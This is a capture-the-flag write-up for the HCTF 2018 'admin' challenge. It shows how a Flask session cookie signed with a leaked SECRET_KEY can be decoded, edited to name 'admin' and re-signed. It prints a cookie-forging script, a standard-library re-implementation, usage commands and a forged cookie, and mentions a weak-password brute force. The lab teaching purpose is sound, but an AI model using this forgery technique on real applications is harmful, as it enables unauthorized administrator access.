
BUU [HCTF 2018]admin

Here I start with the first method: forging the session. Reference article:

https://www.jianshu.com/p/f92311564ad0

Flask keeps the session in a client-side cookie, and it only signs that data. As is well known, a signature protects against tampering; it does nothing to prevent reading.

Flask does not encrypt the session, so its entire content can be read on the client, which can lead to security problems. The signature is also only as strong as the key behind it: anyone who obtains SECRET_KEY can sign arbitrary session content, and the server will accept it.

First, after registering, view the page source of change password; it contains a GitHub download link.

In the downloaded source, config.py contains the secret_key.

Combined with the session cookie from a successful login

and a Flask session cookie encode/decode script found online (it signs and verifies the cookie; there is no encryption involved):

```python
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'

# standard imports
import sys
import zlib
import ast
import argparse  # argument parsing
from abc import ABCMeta  # Abstract Base Classes (PEP 3119); present on every Python 3

# external imports
from itsdangerous import base64_decode
from flask.sessions import SecureCookieSessionInterface

if sys.version_info[0] < 3:
    raise Exception('Must be using at least Python 3')


class MockApp(object):
    """Minimal stand-in for a Flask app: the session serializer only reads secret_key."""

    def __init__(self, secret_key):
        self.secret_key = secret_key


class FSCM(metaclass=ABCMeta):

    @staticmethod
    def encode(secret_key, session_cookie_structure):
        """ Encode (sign) a Flask session cookie from its Python-dict text form """
        try:
            app = MockApp(secret_key)

            session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
            si = SecureCookieSessionInterface()
            s = si.get_signing_serializer(app)

            return s.dumps(session_cookie_structure)
        except Exception as e:
            return "[Encoding error] {}".format(e)

    @staticmethod
    def decode(session_cookie_value, secret_key=None):
        """ Decode a Flask cookie: without the key only the payload is read (signature
        not checked); with the key the signature is verified as the server would """
        try:
            if secret_key is None:
                compressed = False
                payload = session_cookie_value

                # a leading '.' marks a zlib-compressed payload
                if payload.startswith('.'):
                    compressed = True
                    payload = payload[1:]

                data = payload.split(".")[0]

                data = base64_decode(data)
                if compressed:
                    data = zlib.decompress(data)

                return data
            else:
                app = MockApp(secret_key)

                si = SecureCookieSessionInterface()
                s = si.get_signing_serializer(app)

                return s.loads(session_cookie_value)
        except Exception as e:
            return "[Decoding error] {}".format(e)


if __name__ == "__main__":
    # Args are only relevant for __main__ usage

    ## Description for help
    parser = argparse.ArgumentParser(
        description='Flask Session Cookie Decoder/Encoder',
        epilog="Author : Wilson Sumanang, Alexandre ZANNI")

    ## prepare sub commands
    subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')

    ## create the parser for the encode command
    parser_encode = subparsers.add_parser('encode', help='encode')
    parser_encode.add_argument('-s', '--secret-key', metavar='<string>',
                               help='Secret key', required=True)
    parser_encode.add_argument('-t', '--cookie-structure', metavar='<string>',
                               help='Session cookie structure', required=True)

    ## create the parser for the decode command
    parser_decode = subparsers.add_parser('decode', help='decode')
    parser_decode.add_argument('-s', '--secret-key', metavar='<string>',
                               help='Secret key', required=False)
    parser_decode.add_argument('-c', '--cookie-value', metavar='<string>',
                               help='Session cookie value', required=True)

    ## get args
    args = parser.parse_args()

    ## find the option chosen
    if args.subcommand == 'encode':
        if args.secret_key is not None and args.cookie_structure is not None:
            print(FSCM.encode(args.secret_key, args.cookie_structure))
    elif args.subcommand == 'decode':
        if args.secret_key is not None and args.cookie_value is not None:
            print(FSCM.decode(args.cookie_value, args.secret_key))
        elif args.cookie_value is not None:
            print(FSCM.decode(args.cookie_value))
```

A couple of words on how to use this script:

Decode: python flask_session_manager.py decode -c <session_cookie_value> -s <SECRET_KEY>   # -c is the session value from the Flask cookie, -s is the SECRET_KEY (optional: without it only the payload is decoded, with no signature check)
Encode: python flask_session_manager.py encode -s <SECRET_KEY> -t <session_structure>   # -s is the SECRET_KEY, -t is the session's reference structure, i.e. the format the session has after decoding

Copy that session cookie; decoded, the plaintext session is:

{'_fresh': True, '_id': b'd4fb1018e2d755b05dc2163ec54429923444654de222c27ca8c8855643c55e1a47bfa0e1a50478a7952b1a899c81164ccebf8ea54087ad381b8563cb02de9fa2', 'csrf_token': b'8383dbf30b1cdfbf0f180c842975968ee3858874', 'image': b'F38w', 'name': 'miracle778', 'user_id': '10'}

Change the value of name to admin and encode it again, since the goal is to log in with the admin identity.

The resulting session cookie:

.eJw9kE-LwjAQxb_KMmcP6R8vgoddoqXCJLSkleQiamubaeNCVepW_O6bdcHbgzfz4733gN1pqC8tLK7DrZ7BzlaweMDHARZgeO40rUZUbY8ui4QqLfKy01N6FyR6PRVM8HQuVToJnjFBBTNJ8YO0IaSKtGpJ8iYQSjMMMRDb4q5VFmlnWkz-dDEKfoy1Os6F2ljcrmKpev-z8vycdFhaQ23v7xjyJtLbbJJ8bSUvQgyFz7LpjOqdVukSnjM4XobT7vrd1ed3BckxxjD3GBw1rckkxusvh6oZ9dQwpM7X6kKZlD1OTeDjRuJz-cJZt2_qNyknjKvx3znvnTdgXzl7hhncLvXw2g0CBs9fJX1ssA.XPPSPQ.UZ-MG3ZUrN4nJzOXIsfjGdeiyLc

Go back to the page, or swap the session in Burp Suite, and get the flag.
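The whole chain the write-up walks through (read the cookie without the key, edit name, re-sign with the leaked SECRET_KEY), plus the case the write-up implies but does not show (editing without the key fails verification), as an added example that is not code from the original post, from Flask, or from the flask_session_cookie_manager script above. It rebuilds the cookie layout Flask's SecureCookieSessionInterface gets from itsdangerous' URLSafeTimedSerializer using only the standard library, so it runs offline: an optional leading "." for a zlib-compressed payload, base64url segments without padding, a plain Unix timestamp (itsdangerous 1.0 and later; earlier releases counted from 2011), and HMAC-SHA1 under a key derived as HMAC-SHA1(secret_key, "cookie-session"). Two simplifications are assumptions of this example: the JSON step is the stdlib json module with sorted keys, and of Flask's tagged JSON only the bytes tag (" b") is reproduced, which is enough for the session shown above. SECRET_KEY and the session values are constructed placeholders, not the challenge's; the timestamp 1559482941 is what the XPPSPQ segment of the cookie above decodes to.

```python
"""Forging a Flask session cookie with a leaked SECRET_KEY, standard library only.
Layout: [.]base64url(payload).base64url(unix_time).base64url(HMAC-SHA1); a leading '.'
marks a zlib-compressed payload, the MAC key is HMAC-SHA1(secret_key, b"cookie-session").
Assumed simplifications: stdlib json with sorted keys; only the bytes tag (" b") of
Flask's tagged JSON is reproduced."""
import base64
import hashlib
import hmac
import json
import time
import zlib

SALT = b"cookie-session"  # salt Flask hands to itsdangerous for the session cookie

def _b64e(data: bytes) -> bytes:
    return base64.urlsafe_b64encode(data).rstrip(b"=")

def _b64d(data: bytes) -> bytes:
    return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))

def _tag(value):
    """Flask's TaggedJSONSerializer stores bytes as {" b": <base64>}."""
    if isinstance(value, bytes):
        return {" b": base64.b64encode(value).decode("ascii")}
    return {k: _tag(v) for k, v in value.items()} if isinstance(value, dict) else value

def _untag(value):
    if isinstance(value, dict) and list(value) == [" b"]:
        return base64.b64decode(value[" b"])
    return {k: _untag(v) for k, v in value.items()} if isinstance(value, dict) else value

def _signature(secret_key: bytes, value: bytes) -> bytes:
    derived = hmac.new(secret_key, SALT, hashlib.sha1).digest()  # itsdangerous 'hmac' key derivation
    return _b64e(hmac.new(derived, value, hashlib.sha1).digest())

def encode_session(session: dict, secret_key: bytes, timestamp: int = None) -> str:
    """Serialize and sign a session dict the way the server does."""
    raw = json.dumps(_tag(session), separators=(",", ":"), sort_keys=True).encode()
    packed = zlib.compress(raw)
    body = b"." + _b64e(packed) if len(packed) < len(raw) - 1 else _b64e(raw)
    ts = int(time.time()) if timestamp is None else timestamp
    value = body + b"." + _b64e(ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big"))
    return (value + b"." + _signature(secret_key, value)).decode()

def decode_payload(cookie: str) -> dict:
    """Read the session WITHOUT the key: the payload is encoded, not encrypted."""
    raw = cookie.encode()
    compressed = raw.startswith(b".")
    data = _b64d(raw[int(compressed):].split(b".")[0])
    return _untag(json.loads(zlib.decompress(data) if compressed else data))

def verify_and_load(cookie: str, secret_key: bytes):
    """Server side: trust the session only if the HMAC over payload+timestamp matches."""
    value, _, sig = cookie.encode().rpartition(b".")
    if not hmac.compare_digest(_signature(secret_key, value), sig):
        return None
    return decode_payload(cookie)

def forge_name(cookie: str, secret_key: bytes, name: str) -> str:
    """Attacker WITH the leaked key: decode, edit, re-sign (the write-up's method)."""
    session = decode_payload(cookie)
    session["name"] = name
    return encode_session(session, secret_key)

def tamper_without_key(cookie: str, name: str) -> str:
    """Attacker WITHOUT the key: edited payload spliced onto the old timestamp and signature."""
    session = decode_payload(cookie)
    session["name"] = name
    new_body = encode_session(session, b"any").encode().rsplit(b".", 2)[0]
    _, ts, sig = cookie.encode().rsplit(b".", 2)
    return b".".join([new_body, ts, sig]).decode()

# Constructed sample with the shape of the decoded session on this page (values shortened);
# the key is a placeholder, not the challenge's.
SECRET_KEY = b"placeholder-key-from-config.py"
SESSION = {"_fresh": True, "_id": b"d4fb1018e2d755b05dc2163ec5442992",
           "csrf_token": b"8383dbf30b1cdfbf", "image": b"F38w",
           "name": "miracle778", "user_id": "10"}

if __name__ == "__main__":
    cookie = encode_session(SESSION, SECRET_KEY, timestamp=1559482941)  # XPPSPQ in the page's cookie
    print("issued cookie      :", cookie)
    print("read without key   :", decode_payload(cookie))
    forged = forge_name(cookie, SECRET_KEY, "admin")
    print("forged, verified as:", verify_and_load(forged, SECRET_KEY)["name"])
    print("edited without key :", verify_and_load(tamper_without_key(cookie, "admin"), SECRET_KEY))
```

decode_payload is the "signature does not stop reading" half of the argument; verify_and_load is why the key matters: the forged cookie passes because it was re-signed with the same SECRET_KEY, while the spliced one is rejected. A real Flask server additionally passes max_age=PERMANENT_SESSION_LIFETIME when loading, so a forged cookie must carry a fresh timestamp, which encode_session provides by default. For a real target use the flask_session_cookie_manager script above rather than this re-implementation, since Flask's serializer tags more types than bytes.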

Alternatively, a direct weak-password brute force turns up the password 123, which also gets the flag.